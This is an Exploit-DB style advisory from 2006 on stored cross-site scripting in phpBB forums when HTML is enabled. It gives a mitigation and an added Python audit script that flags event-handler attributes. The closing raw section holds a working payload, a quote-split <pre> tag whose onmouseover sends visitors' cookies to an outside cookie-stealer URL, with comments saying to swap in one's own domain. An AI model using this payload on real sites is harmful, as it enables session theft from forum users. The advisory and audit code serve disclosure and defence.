Vendor: phpBB Forums
Author: threesixthousan
CVSS: 4.3 (MEDIUM)
Type: Cross-Site Scripting (XSS)
CWE: 79
Product Name: phpBB Forums
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

XSS Attack Vectors in phpBB Forums

As long as HTML is ON in the latest version of phpBB forums, several XSS attack vectors are possible. phpBB filters HTML incorrectly in both messages and profiles, making cookie stealing and other XSS attacks possible. The exploit leads to arbitrary JavaScript execution, which in turn can lead to HTML defacement. Use of the <pre> tag means that the cursor only has to pass it in the y direction; that is, the mouse only needs to cross a point horizontally equal to the link for the JavaScript to be executed.

Mitigation:

Ensure that HTML is disabled in phpBB forums and that all user input is properly sanitized.
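
An added example, not part of the original advisory and not phpBB's code: a Python audit that tokenises a post with attribute quoting respected and flags event-handler attributes on allowed tags, shown next to a hypothetical first-'>' regex check that misses them, plus the HTML-off rendering named in the mitigation. The allowlist, the function names and the sample post are assumptions constructed for illustration.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample: same attribute layout as the advisory's <pre> tag,
# with a harmless placeholder as the handler body.
SAMPLE_POST = ("<pre a='>' onmouseover='void(0)' b='<pre' >\n"
               "[url]http://www.somesite.com/[/url]</pre>")
ALLOWED_TAGS = {"b", "i", "u", "pre"}  # assumed allowlist, not phpBB's setting


def naive_findings(post):
    """Hypothetical check that assumes every tag ends at the first '>'."""
    return [(name.lower(), "event-handler")
            for name, attrs in re.findall(r"<(\w+)([^>]*)>", post)
            if re.search(r"\bon\w+\s*=", attrs, re.I)]


class AttrAudit(HTMLParser):
    """Tokenises tags while keeping quoted attribute values intact."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append((tag, "tag-not-allowed"))
        for name, value in attrs:
            if name.startswith("on"):  # onmouseover, onclick, ...
                self.findings.append((tag, name))
            elif value and re.match(r"\s*javascript:", value, re.I):
                self.findings.append((tag, name + "=javascript:"))


def audit(post):
    """Return (tag, reason) pairs for markup a forum should not render."""
    parser = AttrAudit()
    parser.feed(post)
    parser.close()
    return parser.findings


def render_with_html_off(post):
    """The advisory's mitigation: the whole post is rendered as text."""
    return html.escape(post, quote=True)


if __name__ == "__main__":
    print(naive_findings(SAMPLE_POST), audit(SAMPLE_POST))
```

The regex check splits the tag at the quoted '>' and so never sees the handler attribute, while the tokenizer reports it; once the post is escaped there is no markup left to audit.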

Exploit-DB raw data:

# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103 (https://www.exploit-db.com/exploits/1103/)
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan 

/*
As long as html is ON in the latest version of phpBB forums, 
several XSS attack vectors are possible. phpBB incorrectly 
filters in both messages and profiles, making cookie stealing, 
and other XSS attacks possible. the exploit leads to arbitrary 
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y 
direction only. e.g. the mouse only needs to cross a point 
horizontally equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >

[url]http://www.somesite.com/[/url]</pre>

# milw0rm.com [2006-01-29]